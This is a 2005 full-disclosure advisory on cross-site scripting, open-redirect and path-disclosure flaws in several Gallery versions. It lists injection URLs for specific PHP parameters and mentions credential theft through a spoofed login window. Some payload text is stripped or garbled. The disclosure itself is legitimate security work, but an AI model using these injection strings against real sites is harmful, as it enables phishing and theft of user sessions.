~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application: Gallery
Vendors: http://gallery.sourceforge.net
Versions: v1.3.4-pl1, v1.4.4-pl2, 2.0 Alpha
Platforms: Windows
Bug: Cross Site Scripting Vulnerability
Exploitation: Remote With Browser
Date: 17 Jan 2005
Author: Rafel Ivgi, The-Insider
E-Mail: the_insider@mail.com
Website: http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1) Introduction
2) Bugs
3) The Code
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===============
1) Introduction
===============
Gallery is open to Cross Site Scripting vulnerability, allowing a remote
attacker to inject and execute scripts on the user’s machine while visiting
a remote gallery.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
======
2) Bug
======
Gallery v1.3.4-pl1 contain a vulnerability inside ‘add_comment.php’ in the
‘index’ field. The injection can be done using the classical tag closing:
">
For Example:
http:///gallery/add_comment.php?set_albumName=Eros&index=1">
Gallery v1.3.4-pl1 also contains vulnerability inside ‘slideshow_low.php’
in ALL the fields. The ‘slideshow_low.php’ contains the following form
fields:
set_albumName
slide_index
slide_full
slide_loop
slide_pause
slide_dir
The injection can be done using the classical tag closing:
">
For Example:
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_
index=3&slide_full=0">&slide_loop=0&slide_pause=3&sl
ide_dir=1
Yet there is Gallery v1.3.4-pl1 vulnerability inside ‘search.php’ in the
‘username’ field. The injection can be done using hex encoded tag closing
and an HTML event:
%22%20onactivate%3D"alert%28%29"
For Example:
http:///gallery/search.php?searchstring=%22%20onactivate%3D"alert%28%29"
Gallery v1.4.4-pl2 contains vulnerability inside ‘login.php’ in the
‘username’ field.
The injection can be done using hex encoded tag closing and an HTML event:
%22%20onactivate%3D"alert%28%29"
http:///gallery/login.php?gallery_popup=true&username=/*%22*/%20
onactivate%3Dalert%28%29%3e
This version of Gallery also has an open redirection, which is a security
risk because
an attacker can send someone a link with a redirection to his evil host name
or to cause
the user to commit an attack or waste a target’s resources.
For Example:
http:///gallery/do_command.php?set_fullOnly=on&return=&cmd= All the vulnerabilities described above can be used to
remotely call
a JavaScript file The injected JavaScript code is responsible for:
Automatic launching of malicious code (remote compromise by I.E exploits).
Identity theft using a spoofed re-login window (only for galleries with
login)
Gallery v2.0 Alpha contains vulnerability inside ‘login.php’ in the
‘g2_form[subject]’
field. The injection can be done using an inline javascript protocol call:
javascript:alert()
For Example:
http:///g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=&g2_form[subject]=[img]javascript:alert
()[/img]&g2_form[action][preview]=preview
Gallery v2.0 Alpha contains another vulnerability inside ‘main.php’ in the
‘g2_subView’ parameter. It is possible the replace any valid subView value
such as: comment
:ShowComments with the admin value: core:UserAdmin. This causes the gallery
to wait 30 seconds
and then print out the Full Path of the gallery on the server.
For Example:
http:///g2/main.php?g2_return= http:///main.php%3Fg2_view%3Dcore
%3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3D< any valid/invalid session
id such as:
be869b98355e8d445c8ec8f97cb343da>&g2_view=core:UserAdmin&g2_subView=core
:UserAdmin
Then the following data will be printed out to the attacker:
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1//www//g2/
modules/core/UserAdmin.inc on line 55
Second Time
Fatal error: Maximum execution time of 30 seconds exceeded in
/mnt/1//www//g2/
modules/core/classes/GalleryUtilities.class on line 596
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
===========
3) The Code
===========
Gallery v1.3.4-pl1
http:///gallery/add_comment.php?set_albumName=Eros&index=1">
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3">alert()&slide_full=0&slide_loop=0&slide_pause=3&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0">&slide_loop=0&slide_pause=3&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0">&slide_pause=3&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3">&slide_dir=1
http:///gallery/slideshow_low.php?set_albumName=A-Or&slide_index=3&sli
de_full=0&slide_loop=0&slide_pause=3&slide_dir=1">
http:///gallery/search.php?searchstring=%22%20onclick%3D"alert%28%29"
Gallery v1.4.4-pl2
http:///gallery/login.php?gallery_popup=true&cool=rafi&username=/*%22*
/%20onactivate%3Dalert%28%29%3e<![CDATA[
http://<host>/gallery/do_command.php?set_fullOnly=on&return=http%3A%2F%2Fwww
.google.com&cmd=
Gallery v2.0 Alpha
1) http://<valid host>/g2/main.php?g2_controller=comment:AddComment&g2
_form[formName]=AddComment&g2_itemId=<valid
item>&g2_form[subject]=[img]javascript:alert()[/img]&g2_form[action][preview
]=preview
2)
http://<host>/g2/main.php?g2_return=<host>%2Fg2%2Fmain.php%3Fg2_view%3Dcore%
3AShowItem%26g2_itemId%3D7150%26g2_GALLERYSID%3Dbe869b98355e8d445c8ec8f97cb3
43da%5C%5C0%5C%5C00%5C%5C%5C%5C0%5C%5C%5C%5C00%3B%250a%250d%250a%250drafi&am
p;g2_view=core:UserAdmin&g2_subView=core:UserAdmin
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com
"Scripts and Codes will make me D.O.S , but they will never HACK me."
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
]]></plaintext></host></host></host></host></host></host></s></host></host></host></name></host></name></valid></valid></valid></valid></escape></valid></valid></valid></valid></valid></span>